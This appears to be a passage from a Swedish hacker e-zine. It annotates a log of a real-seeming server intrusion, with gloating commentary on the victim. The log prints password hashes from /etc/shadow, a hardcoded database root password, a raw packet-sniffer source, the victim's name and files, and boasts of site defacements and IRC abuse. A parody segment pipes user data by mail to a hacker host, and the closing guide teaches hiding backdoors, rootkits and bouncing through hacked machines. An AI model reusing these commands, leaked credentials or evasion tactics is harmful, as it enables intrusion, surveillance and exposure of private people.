20 2002 lj-announce -rw-r--r-- 1 spacedmp spacedmp 697256 Feb 21 2002 warforge.bnetd.v1.14c.tar.gz -rw-r--r-- 1 spacedmp spacedmp 13086 Feb 21 2002 kort1227.gif -rw-r--r-- 1 spacedmp spacedmp 253182 Feb 22 2002 msxml.pas -rw-r--r-- 1 spacedmp spacedmp 8053707 Feb 24 2002 war3.zip -rw-r--r-- 1 spacedmp spacedmp 1178 Mar 1 2002 djdjdjfjkklfs -rw-r--r-- 1 spacedmp spacedmp 37812 Mar 2 2002 #bimbopojkarna.IRCNet.20020302.log -rw-r--r-- 1 spacedmp spacedmp 24005 Mar 5 2002 T61andT62.gif -rw-r--r-- 1 spacedmp spacedmp 344576 Mar 6 2002 after.vsd -rw-r--r-- 1 spacedmp spacedmp 484864 Mar 6 2002 before.vsd -rw-r--r-- 1 spacedmp spacedmp 5197 Mar 9 2002 ulug-provo-hemsa.zip -rwxr-xr-x 1 spacedmp spacedmp 32 Mar 10 2002 nisse.sh -rw-r--r-- 1 spacedmp spacedmp 1336 Mar 10 2002 burken.log -rw-r--r-- 1 spacedmp spacedmp 15262 Mar 12 2002 pinerc016343 -rw-r--r-- 1 spacedmp spacedmp 19456 Mar 15 2002 processorhastigheter.doc -rw-r--r-- 1 spacedmp spacedmp 40526 Mar 18 2002 buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=critical&bug_severity=major&bug_severity=normal&bug_severity=minor -rw-r--r-- 1 spacedmp spacedmp 58 Mar 21 2002 remshit.sh -rw-r--r-- 1 spacedmp spacedmp 1302042 Mar 23 2002 arla-0.35.7.tar.gz -rw-r--r-- 1 spacedmp spacedmp 13926 Mar 27 15:31 anm.cgi drwxrwxr-x 2 spacedmp spacedmp 1024 Mar 29 09:39 t-shirt -rw-rw-r-- 1 spacedmp spacedmp 33306 Apr 1 18:03 selfverification.tar.gz -rw-r--r-- 1 spacedmp spacedmp 9 Apr 3 12:30 nisseroot -rw-r--r-- 1 spacedmp spacedmp 1138398 Apr 3 22:09 squirrelmail-1.2.5.tar.bz2 drwx------ 2 spacedmp spacedmp 4096 Apr 8 07:57 SolveIT drwxr-xr-x 2 spacedmp spacedmp 1024 Apr 9 07:46 tetetetete drwxr-xr-x 3 spacedmp spacedmp 1024 Apr 10 08:44 hack -rw-r--r-- 1 spacedmp spacedmp 443244 Apr 13 19:09 DSC00013.JPG -rw-r--r-- 1 spacedmp spacedmp 3339 Apr 15 00:35 phoogle.tar.gz -rw-r--r-- 1 spacedmp spacedmp 10456 Apr 24 20:02 tfl.nfo drwxr-xr-x 2 spacedmp spacedmp 1024 Apr 28 19:53 .mc -rw-r--r-- 1 spacedmp spacedmp 14832 May 5 10:47 netstat.out drwxr-xr-x 2 spacedmp spacedmp 1024 May 5 14:10 tmptmp -rw-r--r-- 1 spacedmp spacedmp 3792330 May 12 09:21 R._Kelly_-_The_World's_Greatest07.mp3 -rw-rw-r-- 1 spacedmp spacedmp 16463 May 12 13:24 shell-linux-se-FAQ.htm -rw-r--r-- 1 spacedmp spacedmp 10401669 May 20 21:01 Delerium_-_Semantic_Spaces_-_07_-_Flatlands.mp3 -rw-r--r-- 1 spacedmp spacedmp 495065 May 21 18:15 phpBB-2.0.1.tar.gz drwxrwxr-x 2 spacedmp spacedmp 1024 May 21 23:19 mp3-tracit drwxr-xr-x 2 spacedmp spacedmp 1024 May 22 10:23 clones -rw-r--r-- 1 root root 4287 May 25 15:15 spam-mail -rw-r--r-- 1 root root 112 Jun 2 13:19 .bashrc -rw------- 1 spacedmp spacedmp 767260 Jun 9 13:40 ircnet-who.log -rw-r--r-- 1 spacedmp spacedmp 8404 Jun 9 20:56 hardcopy.0 -rw-r--r-- 1 spacedmp spacedmp 700700 Jun 12 20:14 phpBB.dump -rw-r--r-- 1 spacedmp spacedmp 3429 Jun 14 09:44 azer_06_14_02.txt -rw-r--r-- 1 spacedmp spacedmp 122 Jun 15 17:19 compaq-burk -rw-rw-rw- 1 spacedmp spacedmp 0 Jun 20 11:40 .nfs344cd43900014237 -rw-rw-rw- 1 spacedmp spacedmp 0 Jun 23 00:18 .nfs344cd60d0001750f -rw-r--r-- 1 spacedmp spacedmp 2920 Jun 25 15:38 rzr-wc3.006 drwxr-xr-x 2 spacedmp spacedmp 1024 Jun 27 22:46 dkdkdkdkdkdd -rw------- 1 spacedmp spacedmp 194 Jun 30 11:09 .cvspass -rw-r--r-- 1 spacedmp spacedmp 2934646 Jun 30 12:08 screenlog.4 -rw-r--r-- 1 spacedmp spacedmp 49 Jul 1 22:22 menuback.gif -rw-r--r-- 1 spacedmp spacedmp 1422 Jul 6 15:25 mailen.txt -rw-r--r-- 1 spacedmp spacedmp 23 Jul 19 15:23 .htpasswd-cam drwxr-xr-x 22 spacedmp spacedmp 1024 Jul 24 12:34 coding -rw-r--r-- 1 spacedmp spacedmp 484674 Jul 27 14:08 snapshot1.png -rw-r--r-- 1 spacedmp spacedmp 181169 Aug 7 11:18 putty-guide.zip -rw-r--r-- 1 spacedmp spacedmp 404 Aug 7 13:39 putty-latest.zip -rw-r--r-- 1 spacedmp spacedmp 188353 Aug 7 13:41 putty.zip drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 7 13:42 nissenisse drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 10 09:39 solveit -rw-r--r-- 1 spacedmp spacedmp 25313280 Aug 10 11:02 spacedmp.oldlaptop drwxr-xr-x 3 spacedmp spacedmp 1024 Aug 10 11:02 oldlaptop -rw-r--r-- 1 spacedmp spacedmp 1977 Aug 17 18:59 zatzy-sd drwxr-xr-x 4 spacedmp spacedmp 1024 Aug 23 22:04 .irc -rw-r--r-- 1 root root 26955 Aug 24 13:24 evonite.maillog -rw------- 1 spacedmp spacedmp 39761 Aug 25 01:24 ludd-klines -rw------- 1 spacedmp spacedmp 204906 Sep 1 18:16 .pine-debug4 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:30 mrtg.new.cfg_l_3272 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:31 mrtg.new.cfg_l_3431 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:52 mrtg.new.cfg_l_1034 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_949 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_915 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_826 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_756 -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_741 -rw-rw-rw- 1 spacedmp spacedmp 0 Sep 5 16:50 mrtg.new.cfg_l -rw-r--r-- 1 spacedmp spacedmp 15262 Sep 5 20:13 .pinerc -rw------- 1 spacedmp spacedmp 138705 Sep 7 19:46 .pine-debug3 -rw-r--r-- 1 spacedmp spacedmp 6542 Sep 8 21:48 sballo-hosts drwxr-xr-x 2 spacedmp spacedmp 1024 Sep 10 15:15 tetetest -rw------- 1 spacedmp spacedmp 201092 Sep 10 16:52 .pine-debug2 -rw------- 1 spacedmp spacedmp 10568 Sep 11 14:03 sverigetail.log drwxr-xr-x 2 spacedmp spacedmp 2048 Sep 13 23:58 dl -rw-r--r-- 1 spacedmp spacedmp 47 Sep 16 15:57 comhem-koder drwxr-xr-x 2 spacedmp spacedmp 1024 Sep 17 18:22 .ncftp -rw------- 1 spacedmp spacedmp 73058 Sep 17 18:22 anna.log -rw-r--r-- 1 spacedmp spacedmp 1236 Sep 19 12:39 .sieve -rw------- 1 spacedmp spacedmp 8324532 Sep 19 22:53 efnet.log -rw------- 1 spacedmp spacedmp 110103 Sep 20 14:26 solveit.log -rw------- 1 spacedmp spacedmp 201406 Sep 20 19:49 .pine-debug1 -rw-r--r-- 1 spacedmp spacedmp 198991 Sep 21 00:15 doc.tar -rw------- 1 spacedmp spacedmp 858073180 Sep 21 09:38 ircnet.log -rw-r--r-- 1 spacedmp spacedmp 198185 Sep 21 10:02 doc.tgz drwxrwx--x 148 spacedmp spacedmp 10240 Sep 21 10:02 public_html -rw-r--r-- 1 spacedmp spacedmp 14 Sep 22 10:45 djurvall.txt -rw------- 1 spacedmp spacedmp 14165 Sep 22 19:13 dead.letter -rw------- 1 spacedmp spacedmp 120202 Sep 22 21:21 .mysql_history -rw-r----- 1 spacedmp spacedmp 7516 Sep 22 21:21 .bash_history drwx------ 2 spacedmp spacedmp 1024 Sep 22 22:50 mail drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 . drwxr-xr-x 5 root root 0 Sep 23 00:50 .. # # Fr fan, hyr en stdfirma som rensar $HOME din jvla geek # # Ey, Nisseman@IRC - Spacedump hatar dig :-) # Holmen - spacedump gillar inte dig heller # Massor av ircloggar - #droger ligger illa till. # # :DDDDDDDDDDDDDDDDD # Den hr katalogen har stuff till en hel bok med bilder p en hg # Sanna, bilder p fjortisar som visar brstvrter, ircloggar, # lunarstorm-konto. . . :DDDDDDDDDDD # # home-spacedmp.tar.gz kommer sljas p CD-skivor @ blocket.se # $ tail ircnet.log *** No O-lines for your host [11,0109:34:5415,1] Nickname: SpaceDump [11,0109:34:5415,1] n3,01!15,01u6,01@15,1h: SpaceDump3,01!15,1spacedmp6,01@15,1SpaceDump.PP.SE [11,0109:34:5415,1] Realname: Anders Olausson [11,0109:34:5415,1] Channels: #socs [11,0109:34:5415,1] Server: irc.swipnet.se [11,0109:34:5415,1] Info: SWIPnet (Tele2 Sweden AB (Tele2 AB)) [11,0109:34:5415,1] SpaceDump has been idle for 7 seconds [11,0109:34:5415,1] End of whois IRC log ended Sat Sep 21 09:34:56 2002 # Ok, elajt $ cd /var/spool/mail # # r3ad1ng j00r e-m41l, h4wh4wh4wh4w # $ ls -alrt total 16 -rw-rw---- 1 root mail 7429 Jun 21 2000 root drwxr-xr-x 13 root root 4096 Mar 16 2002 .. drwxrwxrwt 2 root mail 4096 Mar 31 11:29 . $ cat root ....... Welcome! Glad to see you've made it this far! :^) ....... Have fun! --- Patrick Volkerding volkerdi@slackware.com ....... # Jaja, nu vet vi i alla fall att vi har root p en slackwareburk $ host -t mx burken.nu burken.nu mail is handled (pri=5) by mail-gw.spacedump.pp.se $ host mail-gw.spacedump.pp.se mail-gw.spacedump.pp.se has address 194.236.124.30 # Ajd ;< # Mail finns p en annan burk $ uname -a Linux fs02 2.4.9 #1 SMP Thu Aug 23 18:44:06 CEST 2001 i686 unknown $ crontab -l & # If you don't want the output of a cron job mailed to you, you have to direct # any output to /dev/null. We'll do this here since these jobs should run # properly on a newly installed system, but if they don't the average newbie # might get quite perplexed about getting strange mail every 5 minutes. :^) # # Run the 'atrun' program every 5 minutes # This runs anything that's due to run from 'at'. See man 'at' or 'atrun'. # Note that this is commented out since it's not needed if you run atd. But, # it's left as an example, since atd isn't strictly required. You can still # run it this way instead. #0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/sbin/atrun 1> /dev/null 2> /dev/null # # This touches a filename in the temp directory so that you can see cron is # working if the timestamp is current. Comment it out if it bugs you. :^) # * * * * * touch /tmp/.crond_running 0 3 * * * /root/scripts/xmms-backup 1> /dev/null 2> /dev/null #0,30 * * * * /usr/apps/rsync/2.4.6/bin/rsync -avzC --delete --delete-after rsync.php.net::phpweb /usr/web/webs/se2.php.net #15 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -rtlzv --delete --exclude incoming dev.apache.org::apache-site /usr/web/webs/www.apache.org 0 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -avzC --delete --delete-after rsync.php.net::phpweb /export/vol2/webs/se2.php.net #15 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -rtlzv --delete --exclude incoming dev.apache.org::apache-site /export/vol2/webs/www.apache.org # ftp-mirrors 15 1 * * * /root/mirror/mirror /root/mirror/packages/ftp.epicsol.org # www3.se.postgresql.org 30 12 * * * /usr/apps/rsync/2.4.6/bin/rsync -avz --progress --stats --rsh=/usr/bin/rsh --delete rsync.postgresql.org::pgsql-www/ /export/vol2/webs/www3.se.postgresql.org/ 30 0 * * * /usr/apps/rsync/2.4.6/bin/rsync -avz --progress --stats --rsh=/usr/bin/rsh --delete rsync.postgresql.org::pgsql-www/ /export/vol2/webs/www3.se.postgresql.org/ 0 0 * * mon /usr/web/bin/apachectl graceful # # Aha - det var ju hygglo att starta om Apache till oss just inatt # Kombinationen av logfilerna och detta cronjobet r mycket vackert. # $ cd /root/src $ ls -l total 40 drwxr-xr-x 2 spacedmp spacedmp 4096 Sep 7 02:10 chkrootkit-pre-0.36 drwxr-xr-x 14 mysql mysql 4096 Jun 30 09:54 cvs-1.11.2 drwxr-xr-x 22 38579 wheel 4096 May 24 2000 cyrus-imapd-1.6.24 drwxr-xr-x 15 utah 30 4096 Sep 5 15:43 krb4-1.1.1 drwxr-xr-x 9 mysql users 4096 Jan 11 2002 libtool-1.4.2 drwxr-xr-x 3 root root 4096 Jan 16 2002 lsof drwxr-xr-x 7 mysql mysql 8192 Sep 15 21:38 openssh-3.4p1 drwxr-xr-x 15 274 wheel 4096 Sep 15 21:37 ucd-snmp-4.2.5 drwxr-xr-x 5 root root 4096 Aug 25 21:29 www # Lille vn, chkrootkit funkar bara om man blir gd av kiddies $ cat /etc/shadow root:7yZxF1iGqXeH.:11616:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: gdm:*:9797:0::::: linux:11oNFsK5/97YU:11617:0::::: bbuser:dm6lHDjg1/8hM:11643:0::::: nobody:*:9797:0::::: warez:7yZxF1iGqX:11770:0::::: annamp3:halFIc6xVVpN6:11770:0::::: ntadmin:!:11915:0:99999:7::: sdlaptop$:!:11915:0:99999:7::: burken-oxv7pnpq$:!:11916:0:99999:7::: puff$:!:11916:0:99999:7::: fs03$:!:11916:0:99999:7::: sd-lfs:/Qs1Tf3YU5VaE:11933:0:99999:7::: # NIS+ :-( $ cd /root/coding $ ls -lart total 20 drwxr-xr-x 10 root bin 4096 Dec 8 2001 irc2.10.3p3 drwxr-xr-x 2 root root 4096 Dec 12 2001 sniff drwx--x--- 17 root root 4096 Sep 20 15:37 .. drwxr-xr-x 5 root root 4096 Sep 22 15:55 . drwxr-xr-x 2 root root 4096 Sep 22 17:05 system-files $ cd sniff $ ls -alrt total 28 -rw-r--r-- 1 root root 2420 Dec 12 2001 sniff.c -rwxr-xr-x 1 root root 13481 Dec 12 2001 sniff drwxr-xr-x 2 root root 4096 Dec 12 2001 . drwxr-xr-x 5 root root 4096 Sep 22 15:55 .. $ cat sniff.c #include <stdio.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/in.h> #include <linux/if_ether.h> #include <net/if.h> #include <sys/ioctl.h> int main() { int sock, n, i; int q; char buffer[2048]; struct ifreq ethreq; unsigned char *iphead, *ethhead; if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP)))<0) { perror("socket"); exit(1); } strncpy(ethreq.ifr_name,"eth0",IFNAMSIZ); if (ioctl(sock,SIOCGIFFLAGS,&ethreq)==-1) { perror("ioctl"); close(sock); exit(1); } ethreq.ifr_flags|=IFF_PROMISC; if (ioctl(sock,SIOCSIFFLAGS,&ethreq)==-1) { perror("ioctl"); close(sock); exit(1); } i = 0; while (1) { n = recvfrom(sock,buffer,2048,0,NULL,NULL); // printf("%d bytes read\n", n); if (n<42) { perror("recvfrom():"); printf("Incomplete packet (errno is %d)\n", errno); close(sock); exit(0); } ethhead = buffer; iphead= buffer+14; // if ((iphead[20]<<8)+iphead[21] == 80) { // printf("%04d ", n); // printf("%02x:%02x:%02x:%02x:%02x:%02x", // ethhead[0],ethhead[1],ethhead[2], // ethhead[3],ethhead[4],ethhead[5]); // printf(" > "); // printf("%02x:%02x:%02x:%02x:%02x:%02x", // ethhead[6],ethhead[7],ethhead[8], // ethhead[9],ethhead[10],ethhead[11]); // printf(" "); if (*iphead==0x45) { // if ((iphead[22]<<8)+iphead[23] == 80) { if ((iphead[12] == 66 && iphead[13] == 70 && iphead[14] == 155 && iphead[15] == 126) || (iphead[16] == 66 && iphead[17] == 70 && iphead[18] == 155 && iphead[19] == 126)) { // if (iphead[16] == 194 && iphead[17] == 236 && iphead[18] == 124 && iphead[19] == 44 && (iphead[22]<<8)+iphead[23] == 80) { printf("%03d.%03d.%03d.%03d:%05d", iphead[12],iphead[13],iphead[14],iphead[15], (iphead[20]<<8)+iphead[21]); printf(" > "); printf("%03d.%03d.%03d.%03d:%05d", iphead[16],iphead[17],iphead[18],iphead[19], (iphead[22]<<8)+iphead[23]); printf("\n"); for (q=0;q<n;q++) { if (buffer[q] > '\32' && buffer[q] < '\170') { printf("%c", buffer[q]); } else { printf("."); } } printf("\n"); } // } // } // printf("\n"); } } } # /* no comment */ $ cd .. $ ls irc2.10.3p3 sniff system-files $ cd sys* $ ls -la total 28 drwxr-xr-x 2 root root 4096 Sep 22 17:05 . drwxr-xr-x 5 root root 4096 Sep 22 15:55 .. -rwxr-xr-x 1 root root 13515 Sep 22 17:05 system-files -rw-r--r-- 1 root root 837 Sep 22 17:05 system-files.c $ cat *.c #include <mysql/mysql.h> #include <stdio.h> int main() { MYSQL SQLCONN; MYSQL_RES *SQLRES; MYSQL_ROW SQLROW; unsigned int num_fields; unsigned int num_rows; unsigned int i; char SQL_QUERY[512]; sprintf(SQL_QUERY, "SELECT * FROM tbl_passwd ORDER BY PASSWD_UID"); mysql_init(&SQLCONN); mysql_real_connect(&SQLCONN, "localhost", "root", "nattis", "_system", 0, NULL, 0); if (!mysql_real_query(&SQLCONN, SQL_QUERY, sizeof(SQL_QUERY))) { SQLRES = mysql_store_result(&SQLCONN); num_fields = mysql_num_fields(SQLRES); num_rows = mysql_num_rows(SQLRES); printf("Num fields: %d Num rows: %d\n", num_fields, num_rows); while (SQLROW = mysql_fetch_row(SQLRES)) { printf("%s:x:%s:%s:%s:%s:/bin/false\n", SQLROW[0], SQLROW[2], SQLROW[3], SQLROW[4], SQLROW[5]); } } mysql_close(&SQLCONN); } # # Rootpass, rootpass.. Hr var det rootpass. Nn som vill ha rootpass? # Borde man inte vara mer frsiktig med sina c0d3z? # $ cd /home/spaced* $ cd .irc* $ ls -alrt total 409 -rw-r--r-- 1 spacedmp spacedmp 867 Dec 27 1999 nickretreive.irc -rw-r--r-- 1 spacedmp spacedmp 1252 Jul 16 2000 hg.irc -rw-r--r-- 1 spacedmp spacedmp 881 Oct 9 2000 sd.oper -rw-r--r-- 1 spacedmp spacedmp 1379 Oct 11 2000 tgrep.irc -rw-r--r-- 1 spacedmp spacedmp 312 Oct 19 2000 mop.irc -rw-r--r-- 1 spacedmp spacedmp 476 Dec 27 2000 autopartuppsala.irc -rw-r--r-- 1 spacedmp spacedmp 1901 Jan 2 2001 tversion.irc -rw-r--r-- 1 spacedmp spacedmp 1348 Mar 17 2001 botfinder.irc -rw-r--r-- 1 spacedmp spacedmp 17827 Apr 7 2001 clients -rw-r--r-- 1 spacedmp spacedmp 45149 Apr 7 2001 clients.reply -rw------- 1 spacedmp spacedmp 34155 Apr 7 2001 botfinder.logfile -rw-r--r-- 1 spacedmp spacedmp 621 Jun 26 2001 wcs.irc -rw-r--r-- 1 spacedmp spacedmp 1234 Jul 14 2001 sd-operview.irc -rw-r--r-- 1 spacedmp spacedmp 5887 Oct 1 2001 sd.operit -rw-r--r-- 1 spacedmp spacedmp 802 Nov 5 2001 igrep.irc -rw-r--r-- 1 spacedmp spacedmp 38239 Dec 18 2001 sd.irc.old -rw-r--r-- 1 spacedmp spacedmp 245 Dec 22 2001 sd2.irc -rw-r--r-- 1 spacedmp spacedmp 63 Dec 31 2001 sd-menu -rw-r--r-- 1 spacedmp spacedmp 335 Jan 1 2002 tabcomplete.irc -rw-r--r-- 1 spacedmp spacedmp 840 Jan 4 2002 kgrep.irc.old -rw-r--r-- 1 spacedmp spacedmp 907 Jan 4 2002 kgrep.irc drwxr-xr-x 3 spacedmp spacedmp 1024 Jan 12 2002 bot -rw-r--r-- 1 spacedmp spacedmp 1411 Feb 14 2002 sd-checkclient.irc -rw-r--r-- 1 spacedmp spacedmp 66 Feb 14 2002 nisse.irc -rw-r--r-- 1 spacedmp spacedmp 39575 Mar 11 2002 sd.irc.backup drwxr-xr-x 2 spacedmp spacedmp 1024 Mar 11 2002 RCS -rw-r--r-- 1 spacedmp spacedmp 39929 Aug 6 14:01 sd.irc -rw-r--r-- 1 spacedmp spacedmp 39929 Aug 6 14:06 sd-new.irc -rw-r--r-- 1 spacedmp spacedmp 19920 Aug 10 22:46 sd.users.bak -rw-r--r-- 1 spacedmp spacedmp 19942 Aug 23 22:04 sd.users drwxr-xr-x 4 spacedmp spacedmp 1024 Aug 23 22:04 . drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 .. $ cd .. $ ls -ld *ssh* -rw------- 1 spacedmp spacedmp 978 Jun 17 2000 mysshkey -rw-r--r-- 1 spacedmp spacedmp 642 Jun 17 2000 mysshkey.pub -rw-r--r-- 1 spacedmp spacedmp 303319 Oct 14 1999 ssh-1.2.26-afs-kerberos.patch-1 -rw-r--r-- 1 root root 201673 Mar 22 2000 ssh-1.2.27-afs-kerberos.patch-1 -rw-r--r-- 1 spacedmp spacedmp 687 Jan 15 2002 sshd_config -rw-r--r-- 1 spacedmp spacedmp 1020 Sep 6 2000 sshstrul $ /sbin/ifconfig -a eth0 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.44 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:155739796 errors:0 dropped:0 overruns:0 frame:0 TX packets:187641314 errors:0 dropped:0 overruns:969 carrier:0 collisions:0 txqueuelen:100 Interrupt:18 eth0:0 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.45 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:18 eth0:1 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.46 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:18 eth0:2 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.47 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:18 eth0:3 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.38 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:18 eth0:5 Link encap:Ethernet HWaddr 00:02:B3:2F:59:C6 inet addr:194.236.124.42 Bcast:194.236.124.63 Mask:255.255.255.224 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 Interrupt:18 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:16447759 errors:0 dropped:0 overruns:0 frame:0 TX packets:16447759 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 $ kill -9 $$ # # Tenta imorgon, dags att samla energi. # Men vi kommer tillbaka, var s sker p det. # Tack och hej, leverpastej Tidigt - Lrdag. Kra Dagbok, Idag hittade jag och mina vnner p mer bus med Spacedumps dator, frst s ndrade vi lite p tv av spacedumps hemsidor.. (www.linux.se och www.xmms.org) Sen s hade vi trkigt och gick ut och lekte p IRC med spacedumps IRC klient. Spacedump r IRCop och har fet mackt ver irken! Givetvis mste vi underska detta genom att dda folk vi fraktar, folk som bara r dumma i huvet och folk som mirkar i mats667's nrhet 07:50 f SignOff tlund: #linux.se (Local Kill by not_here_ (mail -s'all your base are belong to us' tlund@nxs.se )) 07:51 f SignOff sandyman: #linux.se (Killed (not_here_ (grattis p 14rsdagen - //linux.se))) 07:52 f SignOff alfonz: #linux.se (Local Kill by not_here_ (haha p dig med)) 07:56 f SignOff vader__: #linux.se (Kill line active: Abuse (No childpron on IRCNET, please)) 07:57 f SignOff mrsaint: #linux.se (Local Kill by not_here_ (mysiga lilla farbror :))) 07:57 f SignOff granis: #linux.se (Local Kill by not_here_ (mysiga stora farbror :))) 08:06 f SignOff b9AcE: #linux.se (Kill line active: dissa inte homosexuella grupper -- patrik nilsson) 08:09 f SignOff alfonz: #linux.se (Local Kill by not_here_ (spacedump r inte uttrkad, spacedump r gd. dessutom gr du intrng p mitt internet.)) Kom ihg - som vanligt s r det inte personen i loggarna som har tagit knarket. Hack the planet, Free Kevin... - AUH Republican Army +------- | +-------------------------------------------------------------------------+ | En mycket fin logg som visar att du inte behver de nyaste exploiten | | frn bugtraq fr att hacka root p en nd ganska stor server. | | Hr gick hackarna frn att inte ha ngot konto alls, till root p | | servern som innehll allt www material, luras inte av den korta loggen, | | Detta var ngot som tog ngra dagar, Och vi har klippt bort ganska | | mycket (ett par megabyte fr att vara exakt) fr att undvika att | | trka ut er. Det r ju all *Action* man vill se, eller hur? | | | | Och Spacedump, jag hoppas du har skrat upp din burk ;-P | +-------------------------------------------------------------------------+ | +---+[AUH / Arga Unga Hackare ]--------+--------------------------------------+> | | +----------------------------------+ | <---+-------------------------------------------------------------------------+> En kall och mr hstnatt satt vi i vran hgborg och hackade frenetiskt p vra verklockade pentium MMX -terminaler. B0NGrken lg tung ver redaktionen och en av vra skribenter satt ondskefullt skrattande i ett hrn, knaprandes frglada piller. Rummet var fullt av 0nd hackarenergi och vi satt och slackade p mIRKen i vntan p ngot bttre. eftersom det varken gick ngot bra p tv eller var ngra vakna p mIRKen s beslt vi oss fr att hitta p ngot diaboliskt, med ideerna uteblev.. Det var en uttrkad medlem som lite senare kom p den genialiska ideen att posta massa inlgg p lunarstorm, med konton som inte var vra! muhahaha! Vi hackar snabbt Lunarstorms databas-data dr skerheten r lgre n TC-redax efter ett tiotal B0NGar! h3h3h3h3 root@tc_hq>% telnet databas.lunarstorm.se * Vlkjommen till vran databas data! *KjAmiZZar* *fniss* login:bjarre password:****** # grep F14 userdatas.txt | mail hacker@tc_hq.regeringen.se #logout whohoo! nu behver vi bara massa datakraft fr att knycka nyckeln till deras hemmagorda ASP och .NET krypteringssystem! Vi matar vra exalterade hjrnor med mer datadroger och hackar under hga skratt igenom massa konton till vi hittar ngot med CPU att rkna med! Vi hittar snabbt precis vad vi letar efter!! h4h4h4h4!! Vi anvnder som alltid vran egenutvecklade tokoptimerade kodknckare fr dessa hgprioriterade uppdrag av ren 0ndska. root@tc_hq>% rlogin -u 3v1lh4X0rz motherbrain.utwente.nl Welcome to University of Twene Compter Network. $ cd .\ \/.secret/ $ ./ultimate_password_cracker Welcome to The Ultimate Password Cracker. >Connect all other computers on network *Connecting....100%* * you have now totally 1000THz of CPU * >load all cpu power to password_cracker * 0.............100% * >load file lunarstorm_passwd.rot13 * 20000 passwords loaded. * >crack all really fast * cracking speed 30% * * cracking speed 40% * ** SYSLOG MESSAGE: CPU temperature critical ** * cracking speed 50% * * cracking speed 60% * ** SYSLOG MESSAGE: CPU temperature way out of line ** * cracking speed 70% * * cracking speed 80% * ** SYSLOG MESSAGE: several CPU in network is on fire ** * cracking speed 90% * ** SYSLOG MESSAGE: Critical parts of computer are in flames ** LOST CARRIER Otur att undertecknad var upptagen med att rka B0NG nr varningar kom. Vi stdar snyggt undan alla spr och ltsas som inget har hnt. Faktum r att det inte har hnt. Pstr du annat s frnekar vi allt. Vi stnger snabbt av strmmen och drar till nrmsta rejvfest fr att ha vittnen p att vi inte kan ha gjort det, vi hittar snabbt en mnniska med allvarliga tidsstrningar som kan g i ed p att vi var dr flera i timmar. Han bjd oss ven p mer knark. trevlig gosse. - TC - din guide i cyberrymden <+----------------------------------------------------------------------------+> <+---[0x06: Liten guide till ett skrare liv ]--------------------------------+> Sedan tidernas begynnelse har du ftt lra dig att man ska vara frsiktig. ven din mamma har frskt hinta dig om hur viktigt det r att skydda sig. Detta gller ven dina ventyr p internet. Hur du skyddar dig frn att trubbel kan vi dela in i tre omrden. * Lokal Skerhet * Sker ntkonnektivitet * Distant Skerhet Distant skerhet r viktig fr att du inte skall upptckas och ka dit. Tnk p att gmma alla bakdrrar och verktyg s de inte hittas av en slump. anvnd ngon av de olika kernelmodulbakdrrarna fr att gmma kataloger, glm inte att gmma dina processer och ppna sockets! Sker ntkonnektivitet r viktig fr att de inte skall kunna spra dig nr du vl har blivit upptckt. Anvnd alltid bouncers, gr _ingenting_ hemmifrn. Kryptera all din trafik, bounca genom minst en burk som inte loggar. Slutligen den lokala skerheten som r viktig fr att dlja alla spr nr dom vl har sprat dig och tagit din burkar. Anvnd kryptodisk! kryptera allt hemligt! tnk p dim .viminfo, dr ser man vad du har editerat. $HISTFILE loggar allt du gr, det mste du fixa. .ssh/known_hosts innehller alla burkar du har loggat in p. rensa! Vlj lsenord med hg entropi. Nr du raderar filer, anvnd http://wipe.sourceforge.net eller skriv ver filen med dd och /dev/random innan du tar bort den. En bra rutt ser ut ngot som det hr: * Elak Hackare * Lokala bnc's * Hackade skra bnc's * publika proxies * Oskyldigt offer I eventuellt frhr kan det bli frdande om din dator bevisar att du har ngon last. Om polisen exempelvis hittar bevis fr att du hittat p porr i ~/.mplayer* kommer de med stor sannolikhet utnyttja detta mot dig. De kan d frska locka dig 